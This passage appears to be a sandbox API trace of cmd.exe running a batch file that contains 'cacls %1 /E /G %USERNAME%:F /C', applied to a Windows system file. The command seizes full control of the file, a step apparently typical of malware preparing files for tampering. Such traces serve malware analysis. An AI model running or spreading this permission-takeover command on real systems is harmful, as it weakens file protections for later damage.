_String2="TIME") returned -4 [0243.520] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0243.520] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0243.520] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0243.520] GetProcessHeap () returned 0x740000 [0243.520] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x754b48 | out: hHeap=0x740000) returned 1 [0243.520] GetEnvironmentStringsW () returned 0x754288* [0243.520] GetProcessHeap () returned 0x740000 [0243.520] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xae2) returned 0x756be8 [0243.521] FreeEnvironmentStringsW (penv=0x754288) returned 1 [0243.521] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0243.521] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0243.521] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0243.521] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0243.521] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0243.521] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0243.521] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0243.521] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0243.521] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0243.521] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0243.521] GetProcessHeap () returned 0x740000 [0243.521] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x54) returned 0x7576d8 [0243.521] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3df858 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0243.521] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3df858, lpFilePart=0x3df854 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3df854*="Desktop") returned 0x25 [0243.521] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0243.522] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3df5d4 | out: lpFindFileData=0x3df5d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4595f660, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x4595f660, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x753ef0 [0243.522] FindClose (in: hFindFile=0x753ef0 | out: hFindFile=0x753ef0) returned 1 [0243.522] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3df5d4 | out: lpFindFileData=0x3df5d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x45665ae0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x45665ae0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x753ef0 [0243.522] FindClose (in: hFindFile=0x753ef0 | out: hFindFile=0x753ef0) returned 1 [0243.522] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0243.522] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3df5d4 | out: lpFindFileData=0x3df5d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x753ef0 [0243.522] FindClose (in: hFindFile=0x753ef0 | out: hFindFile=0x753ef0) returned 1 [0243.522] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0243.523] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0243.523] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0243.523] GetProcessHeap () returned 0x740000 [0243.523] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756be8 | out: hHeap=0x740000) returned 1 [0243.523] GetEnvironmentStringsW () returned 0x7560f8* [0243.523] GetProcessHeap () returned 0x740000 [0243.523] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb36) returned 0x757f38 [0243.523] FreeEnvironmentStringsW (penv=0x7560f8) returned 1 [0243.523] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0243.523] GetProcessHeap () returned 0x740000 [0243.523] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7576d8 | out: hHeap=0x740000) returned 1 [0243.523] GetProcessHeap () returned 0x740000 [0243.523] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x400e) returned 0x758a78 [0243.524] GetProcessHeap () returned 0x740000 [0243.524] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xee) returned 0x754dc8 [0243.524] GetProcessHeap () returned 0x740000 [0243.524] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x4008) returned 0x75ca90 [0243.524] GetProcessHeap () returned 0x740000 [0243.524] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x4008) returned 0x760aa0 [0243.525] GetProcessHeap () returned 0x740000 [0243.525] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758a78 | out: hHeap=0x740000) returned 1 [0243.525] GetConsoleOutputCP () returned 0x1b5 [0243.525] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0243.525] GetUserDefaultLCID () returned 0x409 [0243.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0243.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3df998, cchData=128 | out: lpLCData="0") returned 2 [0243.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3df998, cchData=128 | out: lpLCData="0") returned 2 [0243.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3df998, cchData=128 | out: lpLCData="1") returned 2 [0243.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0243.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0243.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0243.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0243.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0243.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0243.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0243.527] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0243.527] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0243.527] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0243.527] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0243.528] GetProcessHeap () returned 0x740000 [0243.528] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20c) returned 0x754ec0 [0243.528] GetConsoleTitleW (in: lpConsoleTitle=0x754ec0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0243.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0243.529] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0243.529] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0243.529] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0243.530] GetProcessHeap () returned 0x740000 [0243.530] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x400a) returned 0x758a78 [0243.530] GetProcessHeap () returned 0x740000 [0243.530] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758a78 | out: hHeap=0x740000) returned 1 [0243.532] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0243.532] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0243.532] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0243.532] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0243.533] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0243.533] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0243.533] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0243.533] GetProcessHeap () returned 0x740000 [0243.533] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x58) returned 0x7550d8 [0243.533] GetProcessHeap () returned 0x740000 [0243.533] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x72) returned 0x750ee8 [0243.534] GetProcessHeap () returned 0x740000 [0243.534] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x7e) returned 0x755138 [0243.535] GetConsoleTitleW (in: lpConsoleTitle=0x3df690, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0243.697] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0243.698] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0243.698] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0243.698] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0243.698] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0243.698] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0243.698] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0243.698] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0243.698] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0243.698] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0243.698] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0243.698] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0243.698] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0243.698] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0243.698] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0243.698] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0243.698] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0243.698] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0243.698] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0243.698] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0243.698] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0243.698] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0243.698] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0243.698] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0243.699] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0243.699] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0243.699] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0243.699] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0243.699] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0243.699] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0243.699] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0243.699] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0243.699] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0243.699] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0243.699] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0243.699] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0243.699] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0243.699] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0243.699] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0243.699] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0243.699] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0243.699] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0243.699] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0243.699] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0243.699] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0243.699] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0243.699] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0243.699] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0243.700] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0243.700] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0243.700] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0243.700] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0243.700] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0243.700] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0243.700] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0243.700] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0243.700] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0243.700] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0243.700] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0243.700] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0243.700] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0243.700] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0243.700] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0243.700] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0243.700] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0243.700] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0243.700] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0243.700] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0243.700] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0243.700] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0243.700] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0243.700] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0243.700] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0243.700] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0243.700] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0243.701] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0243.701] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0243.701] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0243.701] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0243.701] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0243.701] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0243.701] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0243.701] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0243.701] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0243.701] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0243.701] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0243.701] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0243.701] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0243.701] GetProcessHeap () returned 0x740000 [0243.701] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x210) returned 0x7551c0 [0243.701] GetProcessHeap () returned 0x740000 [0243.701] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xe8) returned 0x7553d8 [0243.704] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0243.704] GetProcessHeap () returned 0x740000 [0243.704] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x418) returned 0x7407f0 [0243.704] SetErrorMode (uMode=0x0) returned 0x0 [0243.704] SetErrorMode (uMode=0x1) returned 0x0 [0243.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x7407f8, lpFilePart=0x3df1b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3df1b0*="Desktop") returned 0x25 [0243.705] SetErrorMode (uMode=0x0) returned 0x1 [0243.705] GetProcessHeap () returned 0x740000 [0243.705] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x7407f0, Size=0x6e) returned 0x7407f0 [0243.705] GetProcessHeap () returned 0x740000 [0243.705] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x7407f0) returned 0x6e [0243.705] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0243.705] GetProcessHeap () returned 0x740000 [0243.705] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x5a) returned 0x7554c8 [0243.705] GetProcessHeap () returned 0x740000 [0243.705] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xa8) returned 0x755530 [0243.705] GetProcessHeap () returned 0x740000 [0243.705] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x755530, Size=0x5a) returned 0x755530 [0243.705] GetProcessHeap () returned 0x740000 [0243.705] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x755530) returned 0x5a [0243.705] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0243.705] GetProcessHeap () returned 0x740000 [0243.705] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xe0) returned 0x740868 [0243.710] GetProcessHeap () returned 0x740000 [0243.710] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x740868, Size=0x76) returned 0x740868 [0243.710] GetProcessHeap () returned 0x740000 [0243.710] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x740868) returned 0x76 [0243.710] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0243.710] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x3def4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3def4c) returned 0x755598 [0243.710] GetProcessHeap () returned 0x740000 [0243.710] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x14) returned 0x7555d8 [0243.711] FindClose (in: hFindFile=0x755598 | out: hFindFile=0x755598) returned 1 [0243.711] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0243.711] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0243.711] GetConsoleTitleW (in: lpConsoleTitle=0x3df424, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0243.711] GetProcessHeap () returned 0x740000 [0243.711] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x11c) returned 0x7408e8 [0243.711] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0243.711] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0243.711] IdentifyCodeAuthzLevelW () returned 0x1 [0243.766] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0243.767] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0243.767] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0243.767] CloseCodeAuthzLevel () returned 0x1 [0243.767] SetErrorMode (uMode=0x0) returned 0x0 [0243.767] SetErrorMode (uMode=0x1) returned 0x0 [0243.767] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x7551c8, lpFilePart=0x3df310 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x3df310*="Ch81ANBE.bat") returned 0x32 [0243.767] SetErrorMode (uMode=0x0) returned 0x1 [0243.767] GetProcessHeap () returned 0x740000 [0243.767] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x72) returned 0x750f68 [0243.767] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"", _Control=" \x09") returned 0x1 [0243.767] GetProcessHeap () returned 0x740000 [0243.768] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x7c) returned 0x7411b8 [0243.768] GetProcessHeap () returned 0x740000 [0243.768] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xf0) returned 0x7560f8 [0243.768] GetProcessHeap () returned 0x740000 [0243.768] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x7560f8, Size=0x7e) returned 0x7560f8 [0243.768] GetProcessHeap () returned 0x740000 [0243.768] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x7560f8) returned 0x7e [0243.768] CmdBatNotification () returned 0x75522a [0243.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3df354, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0243.769] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0243.769] _get_osfhandle (_FileHandle=3) returned 0x78 [0243.769] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0243.769] _get_osfhandle (_FileHandle=3) returned 0x78 [0243.769] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0243.769] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3df338, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3df338*=0xe2, lpOverlapped=0x0) returned 1 [0243.771] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0243.771] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0243.772] _get_osfhandle (_FileHandle=3) returned 0x78 [0243.772] GetFileType (hFile=0x78) returned 0x1 [0243.772] _get_osfhandle (_FileHandle=3) returned 0x78 [0243.772] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0243.772] GetProcessHeap () returned 0x740000 [0243.772] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x400a) returned 0x758a78 [0243.772] GetProcessHeap () returned 0x740000 [0243.772] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x4008) returned 0x764ab0 [0243.773] GetProcessHeap () returned 0x740000 [0243.773] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x1a) returned 0x7577c8 [0243.773] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0243.773] GetProcessHeap () returned 0x740000 [0243.773] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7577c8 | out: hHeap=0x740000) returned 1 [0243.773] GetProcessHeap () returned 0x740000 [0243.773] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x764ab0 | out: hHeap=0x740000) returned 1 [0243.773] GetProcessHeap () returned 0x740000 [0243.773] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758a78 | out: hHeap=0x740000) returned 1 [0243.774] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0243.774] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0243.774] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0243.774] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0243.774] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0243.774] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0243.774] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0243.774] GetProcessHeap () returned 0x740000 [0243.774] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x58) returned 0x741240 [0243.774] GetProcessHeap () returned 0x740000 [0243.774] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x14) returned 0x7412a0 [0243.777] GetProcessHeap () returned 0x740000 [0243.777] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xbe) returned 0x756180 [0243.778] _tell (_FileHandle=3) returned 32 [0243.778] _close (_FileHandle=3) returned 0 [0243.779] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df10c | out: _Buffer="\r\n") returned 2 [0243.951] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.951] GetFileType (hFile=0x7) returned 0x2 [0243.952] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.952] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0cc | out: lpMode=0x3df0cc) returned 1 [0243.952] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.952] WriteConsoleW (in: hConsoleOutput=0x7, 